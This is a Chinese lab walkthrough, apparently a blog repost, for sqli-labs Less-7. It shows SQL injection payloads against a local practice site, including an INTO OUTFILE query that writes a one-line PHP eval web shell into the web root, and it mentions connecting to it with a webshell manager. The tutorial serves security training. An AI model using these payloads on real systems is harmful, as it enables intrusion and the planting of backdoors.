zoukankan      html  css  js  c++  java
  • Sqli-labs less 7

    Less-7

    本关的标题是dump into outfile,意思是本关我们利用文件导入的方式进行注入。而在background-3中我们已经学习了如何利用dump into file.

    这里首先还是回到源代码中去。重点放在对id参数的处理和sql语句上,从源代码中可以看到$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

    这里对id参数进行了 '))的处理。所以我们其实可以尝试')) or 1=1--+进行注入

    http://127.0.0.1/sqllib/Less-7/?id=1')) or 1=1--+

    那我们这里利用上述提到的文件导入的方式进行演示:

     

    http://127.0.0.1/sqllib/Less-7/?id=1'))UNION SELECT 1,2,3 into outfile "c:\wamp\www\sqllib\Less-7\uuu.txt"%23

    上图中显示sql出错了,但是没有关系,我们可以在文件中看到uuu.txt已经生成了。

    像上述background-3中一样,我们可以直接将一句话木马导入进去。

    http://127.0.0.1/sqllib/Less-7/?id=1'))UNION SELECT 1,2,'<?php @eval($_post["mima"])?>' into outfile "c:\wamp\www\sqllib\Less-7\yijuhua.php"--+

    我们可以在文件中看到一句话木马已经导入进去了

    页面访问

    此时用菜刀等webshell管理工具连接即可,这里不演示此过程了。

    这里还有其他的内容可以导入,可以自己思考进行尝试。同时导入的方法上述在background中已经讲解过了,可以自行尝试。

  • 相关阅读:
    单词统计
    意见汇总
    项目评审结果
    注册表键值
    C++ 创建快捷方式
    XPosed 示例
    直播流程
    C++隐藏任务栏图标
    C++ 屏幕录制
    DUILIB UI创建过程
  • 原文地址:https://www.cnblogs.com/lcamry/p/5763105.html
Copyright © 2011-2022 走看看